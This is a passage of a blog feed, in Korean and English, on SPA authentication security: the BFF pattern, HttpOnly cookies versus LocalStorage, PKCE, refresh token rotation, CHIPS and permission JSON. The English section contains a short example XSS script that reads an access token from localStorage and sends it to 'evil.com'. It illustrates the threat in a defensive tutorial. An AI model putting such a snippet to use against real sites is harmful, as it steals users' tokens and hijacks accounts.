</li> </ol> <h2 id="bff의-보안적-우위">BFF의 보안적 우위</h2> <h3 id="xss-완전-방어">XSS 완전 방어</h3> <p>브라우저에는 JavaScript가 읽을 수 없는 <code class="language-plaintext highlighter-rouge">HttpOnly</code> 쿠키만 있습니다. XSS 공격자가 악성 스크립트를 실행해도 <strong>토큰 자체를 훔칠 수 없습니다</strong>. 기껏해야 사용자 세션으로 요청을 보내는 정도인데, 이건 CSRF 방어로 막을 수 있습니다.</p> <h3 id="액세스-제어-중앙화">액세스 제어 중앙화</h3> <p>BFF에서 API 응답을 필터링하거나, 여러 마이크로서비스 데이터를 집계해서 프론트엔드에 전달할 수 있습니다. Over-fetching 문제도 해결되고 프론트엔드 로직도 단순해집니다.</p> <h3 id="복잡성-격리">복잡성 격리</h3> <p>토큰 갱신, 에러 처리, 로그아웃 같은 복잡한 인증 로직을 백엔드로 격리시켜서 SPA 코드를 비즈니스 로직에만 집중시킬 수 있습니다.</p> <h2 id="토큰-핸들러-패턴-bff의-경량-버전">토큰 핸들러 패턴: BFF의 경량 버전</h2> <p>BFF 패턴의 구현체 중 하나로, 전체 API를 중계하는 대신 <strong>보안 기능에만 특화</strong>된 토큰 핸들러 패턴도 있습니다. Curity 같은 곳에서 제안하는 방식이죠.</p> <p><strong>구성 요소:</strong></p> <ul> <li><strong>OAuth Agent:</strong> 토큰 발급, 갱신, 쿠키 발행만 담당</li> <li><strong>OAuth Proxy:</strong> API 게이트웨이 레벨에서 쿠키를 검증하고 토큰으로 교환</li> </ul> <p><strong>이점:</strong> SPA를 CDN에 정적 배포하면서도, API 게이트웨이만 활용해 BFF의 보안 이점을 누릴 수 있습니다. 별도의 BFF 서버 코드 작성 없이 인프라 설정만으로 보안을 강화할 수 있죠.</p> <hr /> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> —</p> <h1 id="localstorage-vs-cookie-끝나지-않는-논쟁">LocalStorage vs Cookie: 끝나지 않는 논쟁</h1> <p>SPA 개발자들 사이에서 영원한 논쟁거리입니다. “토큰을 어디에 저장할까?” 이 문제는 XSS와 CSRF라는 두 공격 벡터 사이의 트레이드오프를 포함합니다.</p> <h2 id="비교표로-보는-장단점">비교표로 보는 장단점</h2> <table> <thead> <tr> <th>저장 방식</th> <th>XSS 취약성</th> <th>CSRF 취약성</th> <th>영속성</th> <th>특징</th> </tr> </thead> <tbody> <tr> <td>LocalStorage / SessionStorage</td> <td>매우 높음 ⚠️</td> <td>낮음 ✅</td> <td>브라우저 종료 시까지</td> <td>JS로 즉시 접근 가능. XSS 시 즉시 탈취됨. <strong>비권장</strong></td> </tr> <tr> <td>인메모리 (JS 변수)</td> <td>높음 ⚠️</td> <td>낮음 ✅</td> <td>페이지 리로드 시 소멸</td> <td>디스크에 안 남지만 XSS로 메모리 덤프 가능. 새로고침마다 재로그인</td> </tr> <tr> <td>HttpOnly Cookie</td> <td>낮음 ✅</td> <td>높음 ⚠️</td> <td>만료 설정에 따름</td> <td>JS 접근 차단. XSS로 토큰 자체는 못 훔침. <strong>권장</strong></td> </tr> </tbody> </table> <h2 id="xss-vs-csrf-무엇이-더-위험한가">XSS vs CSRF: 무엇이 더 위험한가?</h2> <p>많은 개발자가 “쿠키는 CSRF에 취약하니까 LocalStorage가 낫다”고 오해합니다. 하지만 보안 전문가들의 견해는 정반대입니다.</p> <p><strong>XSS의 파괴력:</strong></p> <ul> <li>토큰이 탈취되면 공격자는 사용자 개입 없이 언제 어디서나 API를 호출하고 계정을 탈취할 수 있습니다</li> <li>방어가 사실상 불가능합니다</li> </ul> <p><strong>CSRF의 방어 가능성:</strong></p> <ul> <li>사용자가 브라우저를 켜고 있을 때만 공격이 가능합니다</li> <li><code class="language-plaintext highlighter-rouge">SameSite</code> 쿠키 정책과 Anti-CSRF 토큰으로 기술적으로 완벽에 가깝게 방어할 수 있습니다</li> </ul> <p><strong>결론:</strong> 방어 기제가 존재하는 CSRF 위험을 감수하더라도, 방어 불가능한 토큰 탈취(XSS)를 막기 위해 <code class="language-plaintext highlighter-rouge">HttpOnly</code> 쿠키를 써야 합니다. 이게 BFF 패턴의 핵심 철학입니다.</p> <h2 id="브라우저의-미래-chips">브라우저의 미래: CHIPS</h2> <p>서드파티 쿠키 차단 정책은 iframe에 임베딩되는 SPA(채팅 위젯, 결제 모듈 등)의 인증 유지에 큰 걸림돌이었습니다. 이를 해결하기 위해 구글 등 브라우저 벤더들이 <strong>CHIPS (Cookies Having Independent Partitioned State)</strong> 기술을 도입했습니다.</p> <p><strong>작동 방식:</strong></p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">Set</span><span class="o">-</span><span class="nx">Cookie</span><span class="p">:</span> <span class="nx">session</span><span class="o">=</span><span class="nx">abc123</span><span class="p">;</span> <span class="nx">Partitioned</span><span class="p">;</span> <span class="nx">Secure</span><span class="p">;</span> <span class="nx">SameSite</span><span class="o">=</span><span class="nx">None</span> </code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">Partitioned</code> 속성을 추가하면, 쿠키가 최상위 사이트별로 격리된 저장소에 저장됩니다. A 사이트에 임베딩된 내 서비스의 쿠키는 B 사이트와 공유되지 않습니다. 서드파티 추적은 막으면서도, 임베디드 앱의 정상적인 세션 유지는 가능해지는 거죠.</p> <hr /> <h1 id="권한-관리-프론트엔드와-백엔드의-동기화">권한 관리: 프론트엔드와 백엔드의 동기화</h1> <p>인증(Authentication)이 “이 사람이 누구냐”를 확인하는 거라면, 인가(Authorization)는 “이 사람이 뭘 할 수 있냐”를 결정하는 겁니다. SPA에서는 백엔드의 권한 로직과 프론트엔드 UI 상태를 동기화해야 하는 복잡한 과제가 있습니다.</p> <h2 id="rbac를-넘어-permission-중심으로">RBAC를 넘어 Permission 중심으로</h2> <p>과거에는 단순히 <code class="language-plaintext highlighter-rouge">role: 'admin'</code> 같은 역할 정보를 프론트엔드에 전달했습니다. 하지만 비즈니스가 복잡해지면 한계에 봉착합니다.</p> <p>예를 들어:</p> <ul> <li>“매니저는 글을 수정할 수 있다” → 간단</li> <li>“매니저는 자기 부서 글만 수정할 수 있다” → 역할 이름만으로는 표현 불가</li> </ul> <p>그래서 최신 트렌드는 <strong>구체적인 권한(Permission) 목록을 JSON으로 전달</strong>하는 겁니다.</p> <h2 id="효율적인-권한-json-구조-casl-스타일">효율적인 권한 JSON 구조 (CASL 스타일)</h2> <p>JavaScript 진영에서 널리 쓰이는 CASL 라이브러리 호환 구조를 권장합니다:</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w"> </span><span class="nl">"user"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"u123"</span><span class="p">,</span><span class="w"> </span><span class="nl">"roles"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"editor"</span><span class="p">],</span><span class="w"> </span><span class="nl">"permissions"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"read"</span><span class="p">,</span><span class="w"> </span><span class="nl">"subject"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Article"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"update"</span><span class="p">,</span><span class="w"> </span><span class="nl">"subject"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Article"</span><span class="p">,</span><span class="w"> </span><span class="nl">"conditions"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"authorId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"${user.id}"</span><span class="p">,</span><span class="w"> </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="s2">"draft"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"delete"</span><span class="p">,</span><span class="w"> </span><span class="nl">"subject"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Comment"</span><span class="p">,</span><span class="w"> </span><span class="nl">"inverted"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p><strong>해석:</strong></p> <ul> <li>모든 Article을 읽을 수 있다(read)</li> <li>작성자가 본인이고 상태가 draft인 Article만 수정할 수 있다(update)</li> <li>Comment는 절대 삭제할 수 없다(inverted: true → Deny 규칙)</li> </ul> <h2 id="동기화-전략">동기화 전략</h2> <p><strong>핵심 원칙: “보안은 서버에서, UX는 클라이언트에서”</strong></p> <ol> <li> <p><strong>API가 진실의 원천(Source of Truth):</strong> 실제 데이터 접근 제어는 반드시 API 서버에서 수행되어야 합니다. 프론트엔드 로직은 우회 가능하므로 절대 신뢰하면 안 됩니다.</p> </li> <li> <p><strong>동기화 메커니즘:</strong> 사용자가 로그인하거나 페이지를 로드할 때, <code class="language-plaintext highlighter-rouge">/api/my-permissions</code> 같은 엔드포인트를 호출해서 권한 JSON을 받아옵니다.</p> </li> <li> <p><strong>UI 제어:</strong> 받은 JSON을 Pinia(Vue)나 Context API(React) 같은 전역 상태 관리자에 저장합니다. 이후 커스텀 디렉티브나 컴포넌트로 UI를 제어합니다:</p> </li> </ol> <div class="language-vue highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!-- Vue 예시 --&gt;</span> <span class="nt">&lt;button</span> <span class="na">v-can=</span><span class="s">"'update', post"</span><span class="nt">&gt;</span>글 수정<span class="nt">&lt;/button&gt;</span> </code></pre></div></div> <div class="language-jsx highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// React 예시</span> <span class="p">&lt;</span><span class="nc">Can</span> <span class="na">I</span><span class="p">=</span><span class="s">"create"</span> <span class="na">a</span><span class="p">=</span><span class="s">"Project"</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nc">CreateButton</span> <span class="p">/&gt;</span> <span class="p">&lt;/</span><span class="nc">Can</span><span class="p">&gt;</span> </code></pre></div></div> <p>권한이 없는 사용자에게는 버튼을 숨기거나 비활성화 처리합니다. 하지만 기억하세요. <strong>이건 UX일 뿐입니다.</strong> 진짜 보안은 백엔드에서!</p> <hr /> <h1 id="결론-및-실전-권고안">결론 및 실전 권고안</h1> <p>2026년의 SPA 보안 환경은 이전보다 훨씬 정교한 아키텍처를 요구합니다. 브라우저의 제약은 강화되고, 공격 기법은 고도화되고 있죠.</p> <h2 id="핵심-요약">핵심 요약</h2> <h3 id="1-bff-패턴-도입-최우선-권장-">1. BFF 패턴 도입 (최우선 권장) 🏆</h3> <p>보안이 중요한 비즈니스 애플리케이션이라면, <strong>토큰을 브라우저에서 완전히 제거</strong>하는 BFF 패턴을 도입하세요. XSS로 인한 계정 탈취를 원천 봉쇄할 수 있는 현재 유일하고도 가장 강력한 아키텍처입니다.</p> <h3 id="2-httponly-쿠키-사용">2. HttpOnly 쿠키 사용</h3> <p>토큰 저장소로는 LocalStorage 대신 <code class="language-plaintext highlighter-rouge">HttpOnly</code>, <code class="language-plaintext highlighter-rouge">Secure</code>, <code class="language-plaintext highlighter-rouge">SameSite</code> 속성이 적용된 쿠키를 사용하세요. 스크립트 접근을 차단하여 보안성을 극대화합니다.</p> <h3 id="3-pkce-및-토큰-로테이션-차선책">3. PKCE 및 토큰 로테이션 (차선책)</h3> <p>BFF 도입이 불가능한 경우(Serverless 환경 등), PKCE 기반 Authorization Code Flow를 사용하되, <strong>반드시 리프레시 토큰 로테이션과 재사용 감지 메커니즘</strong>을 구현하세요. 토큰 탈취 시 피해를 최소화할 수 있습니다.</p> <h3 id="4-세밀한-권한-동기화">4. 세밀한 권한 동기화</h3> <p>권한 관리는 단순 RBAC를 넘어, 조건(Condition)이 포함된 Permission JSON 구조로 프론트-백엔드를 동기화하세요. 단, 최종 권한 검사는 항상 백엔드 API에서!</p> <h2 id="미래-전망">미래 전망</h2> <p>웹 보안은 ‘제로 트러스트(Zero Trust)’ 원칙이 클라이언트단까지 확장될 겁니다. 브라우저는 점점 더 폐쇄적인 환경으로 변모하고(서드파티 쿠키의 완전한 종말), 파티션 쿠키(CHIPS)나 Storage Access API 같은 새로운 표준 기술의 습득이 필수가 될 겁니다.</p> <p>또한 <strong>DPoP(Demonstrating Proof-of-Possession)</strong> 같이 토큰이 특정 클라이언트에 귀속되도록 강제하는 응용 계층 보안 프로토콜도 점차 보편화될 것으로 전망됩니다.</p> <hr /> <h1 id="마무리하며">마무리하며</h1> <p>SPA 보안은 단순히 “어디에 토큰을 저장할까”를 넘어선 문제입니다. 아키텍처 설계부터 보안을 내재화(Security by Design)해야 합니다.</p> <p>오랜만에 SPA 프로젝트를 시작하거나, 레거시 시스템의 보안을 개선해야 한다면 이 글을 북마크해두세요. 필요할 때 다시 읽어보면 도움이 될 겁니다! 🚀</p> <hr /> <h1 id="부록-빠른-참조표">부록: 빠른 참조표</h1> <h2 id="저장소-선택-가이드">저장소 선택 가이드</h2> <table> <thead> <tr> <th>상황</th> <th>권장 방식</th> <th>이유</th> </tr> </thead> <tbody> <tr> <td>프로덕션 환경</td> <td>BFF + HttpOnly Cookie</td> <td>XSS 완전 방어</td> </tr> <tr> <td>Serverless SPA</td> <td>PKCE + 토큰 로테이션</td> <td>백엔드 구축 불가 시 차선책</td> </tr> <tr> <td>개발/테스트 환경</td> <td>LocalStorage (임시)</td> <td>편의성, 단 프로덕션 전 교체 필수</td> </tr> <tr> <td>임베디드 위젯</td> <td>CHIPS 활용</td> <td>서드파티 쿠키 차단 우회</td> </tr> </tbody> </table> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> Thu, 22 Jan 2026 11:00:00 +0900 http://thecodinglog.github.io/security/2026/01/22/spa-security-kor.html http://thecodinglog.github.io/security/2026/01/22/spa-security-kor.html Security SPA Security SPA Security Architecture | Why You Shouldn't Store Tokens in the Browser 🔐 <h1 id="spa-security-architecture-why-you-shouldnt-store-tokens-in-the-browser-">SPA Security Architecture: Why You Shouldn’t Store Tokens in the Browser 🔐</h1> <p>Ever found yourself wondering “Should I store tokens in LocalStorage or cookies?” while building your SPA? Or thought “What’s PKCE and why do I need it?” If so, this article is your answer. We’ve compiled everything you need to know about SPA authentication and authorization—the hottest topic in web security as of 2025.</p> <hr /> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> <hr /> <h1 id="why-is-spa-security-so-hard">Why Is SPA Security So Hard?</h1> <h2 id="the-trust-boundary-has-collapsed">The Trust Boundary Has Collapsed</h2> <p>Traditional web applications were simple. The server rendered HTML, and the browser just displayed it. Session information was safely stored in server memory, and the client only held a simple session ID cookie.</p> <p>But SPAs are different. Business logic has moved to the browser, and state management happens on the client side. We can build gorgeous UIs with React or Vue, but from a security perspective, it’s been a disaster. <strong>We now have to store sensitive authentication tokens in an untrusted environment—the browser.</strong></p> <h2 id="the-public-client-dilemma">The Public Client Dilemma</h2> <p>The OAuth 2.0 standard classifies clients into two types:</p> <p><strong>Confidential Client:</strong> Applications running on servers. They can safely store <code class="language-plaintext highlighter-rouge">client_secret</code>. Think Node.js backends or Spring Boot servers.</p> <p><strong>Public Client:</strong> Applications running on user devices. SPAs, mobile apps, and desktop apps fall into this category. Since the code is exposed to users, they cannot keep secrets.</p> <p>SPAs are inherently public clients because JavaScript code runs directly in the browser. Anyone can open the developer tools and see everything. Hardcoding <code class="language-plaintext highlighter-rouge">client_secret</code> in your code? That’s like committing your password to GitHub.</p> <hr /> <h1 id="threats-facing-public-clients">Threats Facing Public Clients</h1> <h2 id="1-client-impersonation">1. Client Impersonation</h2> <p>Confidential clients prove their identity with <code class="language-plaintext highlighter-rouge">client_secret</code>. But public clients can’t do this. If you accidentally include <code class="language-plaintext highlighter-rouge">client_secret</code> in your SPA code, attackers can extract it using developer tools and impersonate your legitimate app.</p> <p>Why is this a problem? Attackers can phish user data or request unauthorized tokens at will. That’s why IETF and OWASP strictly prohibit using Client Credentials Grant with public clients.</p> <h2 id="2-the-fall-of-implicit-flow">2. The Fall of Implicit Flow</h2> <p>In the early days of SPA development, Implicit Flow was popular. It skipped the authorization code exchange step and delivered tokens directly in the URL hash fragment (<code class="language-plaintext highlighter-rouge">#</code>).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://myapp.com/callback#access_token=eyJhbG... </code></pre></div></div> <p>Looks simple, but it had fatal flaws:</p> <ul> <li><strong>Token Leakage:</strong> Tokens in URLs are exposed through browser history, proxy logs, and Referer headers</li> <li><strong>No Refresh:</strong> For security reasons, refresh tokens weren’t issued, requiring re-authentication every time the access token expired</li> <li><strong>Third-Party Cookie Blocking:</strong> Silent renewal via iframes was blocked by ITP (Intelligent Tracking Prevention) policies</li> </ul> <p>So as of 2025, Implicit Flow has been completely deprecated. It was removed from the OAuth 2.1 standard.</p> <h2 id="3-xss-the-most-dangerous-enemy">3. XSS: The Most Dangerous Enemy</h2> <p>The biggest threat to public clients is <strong>XSS (Cross-Site Scripting)</strong> attacks. SPAs depend on countless npm packages and CDN scripts. If even one gets infected or your code has vulnerabilities, attackers can execute malicious scripts to steal tokens.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Attacker's malicious script</span> <span class="kd">const</span> <span class="nx">token</span> <span class="o">=</span> <span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">access_token</span><span class="dl">'</span><span class="p">);</span> <span class="nx">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://evil.com/steal</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">method</span><span class="p">:</span> <span class="dl">'</span><span class="s1">POST</span><span class="dl">'</span><span class="p">,</span> <span class="na">body</span><span class="p">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span> <span class="nx">token</span> <span class="p">})</span> <span class="p">});</span> </code></pre></div></div> <p>Unlike server-side sessions, tokens like JWT carry authority themselves. Once stolen, attackers can call any API as if they were the user.</p> <hr /> <h1 id="solution-1-pkce-based-authorization-code-flow">Solution 1: PKCE-based Authorization Code Flow</h1> <p>If you’re hosting your SPA statically on S3 or a CDN without a backend, you need to handle authentication in the browser alone. The only standard for this is the <strong>PKCE (Proof Key for Code Exchange)</strong> enabled Authorization Code Flow.</p> <h2 id="what-is-pkce">What Is PKCE?</h2> <p>PKCE (pronounced “pixie”) was originally designed for mobile apps but is now the standard for all public clients. The core concept is creating and verifying a <strong>dynamic secret</strong>.</p> <h3 id="how-it-works">How It Works</h3> <ol> <li><strong>Generate Code Verifier:</strong> The client generates a cryptographically random string <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">const</span> <span class="nx">codeVerifier</span> <span class="o">=</span> <span class="nx">generateRandomString</span><span class="p">(</span><span class="mi">128</span><span class="p">);</span> </code></pre></div> </div> </li> <li><strong>Derive Code Challenge:</strong> Hash the verifier with SHA-256 <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">const</span> <span class="nx">codeChallenge</span> <span class="o">=</span> <span class="nx">base64url</span><span class="p">(</span><span class="nx">sha256</span><span class="p">(</span><span class="nx">codeVerifier</span><span class="p">));</span> </code></pre></div> </div> </li> <li><strong>Authentication Request:</strong> Send the challenge to the auth server <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/authorize?code_challenge=E9M...&amp;code_challenge_method=S256 </code></pre></div> </div> </li> <li><strong>Token Exchange:</strong> After receiving the authorization code, send the original verifier <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/token?code=abc123&amp;code_verifier=original_random_string </code></pre></div> </div> </li> <li><strong>Verification:</strong> The server hashes the verifier and compares it with the initial challenge</li> </ol> <h3 id="why-is-this-secure">Why Is This Secure?</h3> <p>Even if an attacker intercepts the authorization code during the redirect, it’s useless. To exchange it for tokens, they need the original <code class="language-plaintext highlighter-rouge">code_verifier</code>, which can’t be reconstructed due to the hash’s preimage resistance. <strong>Attackers have the code but can’t get the token.</strong></p> <h2 id="pkces-limitations-and-refresh-token-rotation">PKCE’s Limitations and Refresh Token Rotation</h2> <p>PKCE protects the authorization code, but ultimately the issued tokens must be stored in the browser. The XSS risk still exists. To mitigate this, <strong>Refresh Token Rotation</strong> is essential.</p> <p><strong>How It Works:</strong></p> <ul> <li>Make refresh tokens single-use</li> <li>Issue a new refresh token every time you refresh the access token, immediately revoking the previous one</li> <li>If someone tries to refresh using an already-used (stolen) token, the server recognizes <strong>“Token theft!”</strong> and invalidates all tokens in that token family</li> </ul> <p>This logs out both the attacker and the legitimate user, but it’s a powerful defense that blocks attack persistence.</p> <hr /> <h1 id="solution-2-bff-backend-for-frontend-pattern">Solution 2: BFF (Backend for Frontend) Pattern</h1> <p>The best architecture <strong>strongly recommended</strong> by IETF and security experts. The philosophy is simple:</p> <p><strong>“No Tokens in the Browser”</strong></p> <h2 id="understanding-bff-architecture">Understanding BFF Architecture</h2> <p>BFF places a dedicated backend between the SPA and API servers. This backend can be a lightweight server implemented in Node.js, .NET, or Java, or an API gateway plugin.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Browser] ←→ [BFF] ←→ [Auth Server] ↓ [API Server] </code></pre></div></div> <h3 id="how-it-works-1">How It Works</h3> <ol> <li> <p><strong>Confidential Client Transformation:</strong> BFF runs in a server environment, so it can safely manage <code class="language-plaintext highlighter-rouge">client_secret</code></p> </li> <li> <p><strong>Token Hiding:</strong> When users log in, the BFF communicates with the auth server to receive tokens. <strong>The important part is these tokens are never sent to the browser.</strong> Tokens are stored only in BFF’s memory, Redis, or encrypted cookies.</p> </li> <li> <p><strong>Session Cookie Issuance:</strong> The BFF gives the SPA a session cookie with <code class="language-plaintext highlighter-rouge">HttpOnly</code>, <code class="language-plaintext highlighter-rouge">Secure</code>, and <code class="language-plaintext highlighter-rouge">SameSite</code> attributes instead of tokens. This cookie is just an identifier, with no JWT payload or anything like that.</p> </li> <li> <p><strong>Proxy Role:</strong> When the SPA calls an API and sends the cookie to the BFF, the BFF validates the cookie, finds the actual access token, and injects it into the API request’s <code class="language-plaintext highlighter-rouge">Authorization</code> header before forwarding.</p> </li> </ol> <h2 id="bffs-security-advantages">BFF’s Security Advantages</h2> <h3 id="complete-xss-defense">Complete XSS Defense</h3> <p>The browser only has an <code class="language-plaintext highlighter-rouge">HttpOnly</code> cookie that JavaScript can’t read. Even if XSS attackers execute malicious scripts, they <strong>cannot steal the token itself</strong>. At most they can make requests using the user’s session, but that’s preventable with CSRF defenses.</p> <h3 id="centralized-access-control">Centralized Access Control</h3> <p>The BFF can filter API responses or aggregate data from multiple microservices before delivering it to the frontend. This solves over-fetching problems and simplifies frontend logic.</p> <h3 id="complexity-isolation">Complexity Isolation</h3> <p>You can isolate complex authentication logic like token refresh, error handling, and logout to the backend, letting SPA code focus on business logic.</p> <h2 id="token-handler-pattern-bff-lite">Token Handler Pattern: BFF Lite</h2> <p>One implementation of the BFF pattern, the token handler pattern <strong>specializes only in security features</strong> instead of relaying all APIs. It’s an approach proposed by companies like Curity.</p> <p><strong>Components:</strong></p> <ul> <li><strong>OAuth Agent:</strong> Handles only token issuance, refresh, and cookie issuance</li> <li><strong>OAuth Proxy:</strong> Operates at the API gateway level to validate cookies and exchange them for tokens</li> </ul> <p><strong>Benefit:</strong> You can statically deploy your SPA to a CDN while leveraging API gateways to gain BFF’s security benefits. You can enhance security with just infrastructure configuration without writing separate BFF server code.</p> <hr /> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> —</p> <h1 id="localstorage-vs-cookie-the-never-ending-debate">LocalStorage vs Cookie: The Never-Ending Debate</h1> <p>This is an eternal debate among SPA developers: “Where should I store tokens?” This issue involves a tradeoff between two attack vectors: XSS and CSRF.</p> <h2 id="pros-and-cons-comparison">Pros and Cons Comparison</h2> <table> <thead> <tr> <th>Storage Method</th> <th>XSS Vulnerability</th> <th>CSRF Vulnerability</th> <th>Persistence</th> <th>Characteristics</th> </tr> </thead> <tbody> <tr> <td>LocalStorage / SessionStorage</td> <td>Very High ⚠️</td> <td>Low ✅</td> <td>Until browser closes</td> <td>Immediately accessible via JS. Instantly stolen on XSS. <strong>Not recommended</strong></td> </tr> <tr> <td>In-Memory (JS variables)</td> <td>High ⚠️</td> <td>Low ✅</td> <td>Lost on page reload</td> <td>Not stored on disk but memory dump possible via XSS. Re-login on every refresh</td> </tr> <tr> <td>HttpOnly Cookie</td> <td>Low ✅</td> <td>High ⚠️</td> <td>Based on expiry settings</td> <td>JS access blocked. Can’t steal token itself via XSS. <strong>Recommended</strong></td> </tr> </tbody> </table> <h2 id="xss-vs-csrf-which-is-more-dangerous">XSS vs CSRF: Which Is More Dangerous?</h2> <p>Many developers mistakenly think “Cookies are vulnerable to CSRF, so LocalStorage is better.” But security experts’ views are the opposite.</p> <p><strong>XSS’s Destructive Power:</strong></p> <ul> <li>Once tokens are stolen, attackers can call APIs and hijack accounts anytime, anywhere without user involvement</li> <li>Defense is practically impossible</li> </ul> <p><strong>CSRF’s Defensibility:</strong></p> <ul> <li>Attacks are only possible when users have their browsers open</li> <li>Can be defended near-perfectly with <code class="language-plaintext highlighter-rouge">SameSite</code> cookie policies and Anti-CSRF tokens</li> </ul> <p><strong>Conclusion:</strong> Even though CSRF risks exist (but are defensible), we should use <code class="language-plaintext highlighter-rouge">HttpOnly</code> cookies to prevent undefendable token theft (XSS). This is the core philosophy of the BFF pattern.</p> <h2 id="the-browsers-future-chips">The Browser’s Future: CHIPS</h2> <p>Third-party cookie blocking policies have been a major obstacle to maintaining authentication for SPAs embedded in iframes (chat widgets, payment modules, etc.). To solve this, browser vendors like Google introduced <strong>CHIPS (Cookies Having Independent Partitioned State)</strong> technology.</p> <p><strong>How It Works:</strong></p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">Set</span><span class="o">-</span><span class="nx">Cookie</span><span class="p">:</span> <span class="nx">session</span><span class="o">=</span><span class="nx">abc123</span><span class="p">;</span> <span class="nx">Partitioned</span><span class="p">;</span> <span class="nx">Secure</span><span class="p">;</span> <span class="nx">SameSite</span><span class="o">=</span><span class="nx">None</span> </code></pre></div></div> <p>Adding the <code class="language-plaintext highlighter-rouge">Partitioned</code> attribute stores cookies in isolated storage per top-level site. Cookies for your service embedded in Site A aren’t shared with Site B. This blocks third-party tracking while allowing normal session maintenance for embedded apps.</p> <hr /> <h1 id="authorization-management-frontend-backend-synchronization">Authorization Management: Frontend-Backend Synchronization</h1> <p>If authentication is about “who is this person,” authorization is about “what can this person do.” SPAs face the complex challenge of synchronizing backend authorization logic with frontend UI state.</p> <h2 id="beyond-rbac-to-permission-centric">Beyond RBAC to Permission-Centric</h2> <p>In the past, we simply passed role information like <code class="language-plaintext highlighter-rouge">role: 'admin'</code> to the frontend. But as business gets complex, this hits limitations.</p> <p>For example:</p> <ul> <li>“Managers can edit articles” → Simple</li> <li>“Managers can only edit articles from their department” → Can’t express with role names alone</li> </ul> <p>So the latest trend is <strong>delivering specific permission lists in JSON format</strong>.</p> <h2 id="efficient-permission-json-structure-casl-style">Efficient Permission JSON Structure (CASL Style)</h2> <p>We recommend a structure compatible with the widely-used CASL library in the JavaScript ecosystem:</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w"> </span><span class="nl">"user"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"u123"</span><span class="p">,</span><span class="w"> </span><span class="nl">"roles"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"editor"</span><span class="p">],</span><span class="w"> </span><span class="nl">"permissions"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"read"</span><span class="p">,</span><span class="w"> </span><span class="nl">"subject"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Article"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"action"</span><span class="p">:</span><span class="w"> </span><span 